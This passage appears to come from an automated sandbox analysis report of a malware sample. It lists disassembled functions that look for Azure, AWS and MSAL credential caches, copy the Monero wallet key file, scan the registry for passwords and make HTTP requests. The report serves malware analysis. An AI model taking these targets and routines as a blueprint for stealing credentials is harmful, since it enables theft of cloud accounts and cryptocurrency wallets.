HttpOpenRequestA.WININET(00000000,GET,?,0114DEE0,00000000,00000000,00400100,00000000), ref: 00366385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003663BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003663D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003663FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0036646D
InternetCloseHandle.WININET(00000000), ref: 003664EF
InternetCloseHandle.WININET(00000000), ref: 003664F9
InternetCloseHandle.WININET(00000000), ref: 00366503

Strings

GET, xrefs: 0036637C
ERROR, xrefs: 003664C9
ERROR, xrefs: 00366407

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 7213b0c3704e26d047beee9d23dd07d174783b22d5f8e0562580a4e3cd838664
Instruction ID: 7fe08d6170c5a4d6ee76893ec06821aa062c9b8043b57a64b7efbc9e40fa51f6
Opcode Fuzzy Hash: 7213b0c3704e26d047beee9d23dd07d174783b22d5f8e0562580a4e3cd838664
Instruction Fuzzy Hash: EE715271A00318ABDB26DFA0CC56FEE7778FB45700F108198F50A6B194DBB46A89DF52

Function 00375510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A820: lstrlen.KERNEL32(00364F05,?,?,00364F05,00380DDE), ref: 0037A82B
Part of subcall function 0037A820: lstrcpy.KERNEL32(00380DDE,00000000), ref: 0037A885

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003756A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375857

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375228

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 003752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375318
Part of subcall function 003752C0: lstrlen.KERNEL32(00000000), ref: 0037532F
Part of subcall function 003752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00375364
Part of subcall function 003752C0: lstrlen.KERNEL32(00000000), ref: 00375383
Part of subcall function 003752C0: lstrlen.KERNEL32(00000000), ref: 003753AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0037578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375A0C
Sleep.KERNEL32(0000EA60), ref: 00375A1B

Strings

ERROR, xrefs: 0037577D
ERROR, xrefs: 00375693
ERROR, xrefs: 00375849
ERROR, xrefs: 003759FE
ERROR, xrefs: 00375932
ERROR, xrefs: 00375636

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 3830b5b5c57c4bcd2f885d36f000671cb4ce8bfb2243a50945b64dc975e7491c
Instruction ID: 602e72f2e6e26369e903d14df99932d5ea7c8480b2bea69c27b6048556abebec
Opcode Fuzzy Hash: 3830b5b5c57c4bcd2f885d36f000671cb4ce8bfb2243a50945b64dc975e7491c
Instruction Fuzzy Hash: 77E15871910608AACB2AFBB0DC569ED773CAF95300F50C528B51B5A095EF385A0DDB93

Function 00374D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

lstrcat.KERNEL32(?,00000000), ref: 00374DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00374DCD

Part of subcall function 00374910: wsprintfA.USER32 ref: 0037492C
Part of subcall function 00374910: FindFirstFileA.KERNEL32(?,?), ref: 00374943

lstrcat.KERNEL32(?,00000000), ref: 00374E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00374E59

Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,00380FDC), ref: 00374971
Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,00380FE0), ref: 00374987
Part of subcall function 00374910: FindNextFileA.KERNEL32(000000FF,?), ref: 00374B7D
Part of subcall function 00374910: FindClose.KERNEL32(000000FF), ref: 00374B92

lstrcat.KERNEL32(?,00000000), ref: 00374EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00374EE5

Part of subcall function 00374910: wsprintfA.USER32 ref: 003749B0
Part of subcall function 00374910: StrCmpCA.SHLWAPI(?,003808D2), ref: 003749C5
Part of subcall function 00374910: wsprintfA.USER32 ref: 003749E2
Part of subcall function 00374910: PathMatchSpecA.SHLWAPI(?,?), ref: 00374A1E
Part of subcall function 00374910: lstrcat.KERNEL32(?,0114EA78), ref: 00374A4A
Part of subcall function 00374910: lstrcat.KERNEL32(?,00380FF8), ref: 00374A5C
Part of subcall function 00374910: lstrcat.KERNEL32(?,?), ref: 00374A70
Part of subcall function 00374910: lstrcat.KERNEL32(?,00380FFC), ref: 00374A82
Part of subcall function 00374910: lstrcat.KERNEL32(?,?), ref: 00374A96
Part of subcall function 00374910: CopyFileA.KERNEL32(?,?,00000001), ref: 00374AAC
Part of subcall function 00374910: DeleteFileA.KERNEL32(?), ref: 00374B31

Strings

Azure\.aws, xrefs: 00374E5F
\.azure\, xrefs: 00374DC1
\.IdentityService\, xrefs: 00374ED9
*.*, xrefs: 00374DD8
Azure\.azure, xrefs: 00374DD3
msal.cache, xrefs: 00374EF0
\.aws\, xrefs: 00374E4D
*.*, xrefs: 00374E64
Azure\.IdentityService, xrefs: 00374EEB

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 9599916815ceff62a4d68c00fb5a2f658862f57961a95ef4ddec8a8c8ca3ae6c
Instruction ID: 9e309f785dd6187e0b8e9db00b31c9373c34335f6e32d4b32e084487596e660c
Opcode Fuzzy Hash: 9599916815ceff62a4d68c00fb5a2f658862f57961a95ef4ddec8a8c8ca3ae6c
Instruction Fuzzy Hash: 344183B995030866D765F760EC47FED7238AB65704F008494B2896A0C1EEB86BC98B93

Function 00361310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003612B4
Part of subcall function 003612A0: RtlAllocateHeap.NTDLL(00000000), ref: 003612BB
Part of subcall function 003612A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003612D7
Part of subcall function 003612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
Part of subcall function 003612A0: RegCloseKey.ADVAPI32(?), ref: 003612FF

lstrcat.KERNEL32(?,00000000), ref: 0036134F
lstrlen.KERNEL32(?), ref: 0036135C
lstrcat.KERNEL32(?,.keys), ref: 00361377

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 00378B60: GetSystemTime.KERNEL32(00380E1A,0114A480,003805AE,?,?,003613F9,?,0000001A,00380E1A,00000000,?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 00378B86

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00361465

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003699EC
Part of subcall function 003699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00369A11
Part of subcall function 003699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00369A31
Part of subcall function 003699C0: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 00369A5A
Part of subcall function 003699C0: LocalFree.KERNEL32(0036148F), ref: 00369A90
Part of subcall function 003699C0: CloseHandle.KERNEL32(000000FF), ref: 00369A9A

DeleteFileA.KERNEL32(00000000), ref: 003614EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00361335
\Monero\wallet.keys, xrefs: 0036138D
.keys, xrefs: 0036136B
wallet_path, xrefs: 00361330

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: e3c144f7b26d6729cca3427b497dab8c3e9e9b160af9f2e02067f48ef7086191
Instruction ID: 75f17cb8b43044546cbc8e00a685b3b36dafaba69328677739482ca5a01abbc9
Opcode Fuzzy Hash: e3c144f7b26d6729cca3427b497dab8c3e9e9b160af9f2e02067f48ef7086191
Instruction Fuzzy Hash: A65145B195021957CB66FB60DC92FEE737C9F54300F4081D8B60E66081EF346B89CBA6

Function 00377500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00377542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377603
RtlAllocateHeap.NTDLL(00000000), ref: 0037760A
wsprintfA.USER32 ref: 00377640

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Strings

\, xrefs: 00377560
8, xrefs: 0037764D, 00377655, 0037761B, 00377623
C, xrefs: 0037754C
:, xrefs: 0037755C

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$8
API String ID: 1544550907-3122672385
Opcode ID: 4a02b443d0812337fb8d82616d4a1e61a73b3d6d42baa3c5634e84d2155c7363
Instruction ID: 1ef2df308fe000ed64ab102cfe0fcc0c77802849b3a4cafa67add7e7792a56d8
Opcode Fuzzy Hash: 4a02b443d0812337fb8d82616d4a1e61a73b3d6d42baa3c5634e84d2155c7363
Instruction Fuzzy Hash: 8441B4B1D04258ABDF21DF94DC45BEEBBB8EF19710F104098F5096B280D7786A48CFA5

Function 003675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003672D0: memset.MSVCRT ref: 00367314
Part of subcall function 003672D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0036733A
Part of subcall function 003672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003673B1
Part of subcall function 003672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0036740D
Part of subcall function 003672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00367452
Part of subcall function 003672D0: HeapFree.KERNEL32(00000000), ref: 00367459

lstrcat.KERNEL32(2F476020,003817FC), ref: 00367606
lstrcat.KERNEL32(2F476020,00000000), ref: 00367648
lstrcat.KERNEL32(2F476020, : ), ref: 0036765A
lstrcat.KERNEL32(2F476020,00000000), ref: 0036768F
lstrcat.KERNEL32(2F476020,00381804), ref: 003676A0
lstrcat.KERNEL32(2F476020,00000000), ref: 003676D3
lstrcat.KERNEL32(2F476020,00381808), ref: 003676ED
task.LIBCPMTD ref: 003676FB

Strings

: , xrefs: 0036764E

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 4af05102c915a14d538cff872e7859591daa57f418c424bc714c9f76de1161e5
Instruction ID: f0ecf9e0b8f613af97bc7a7b121764b6c31ff448188160eb8768bdfd72866be3
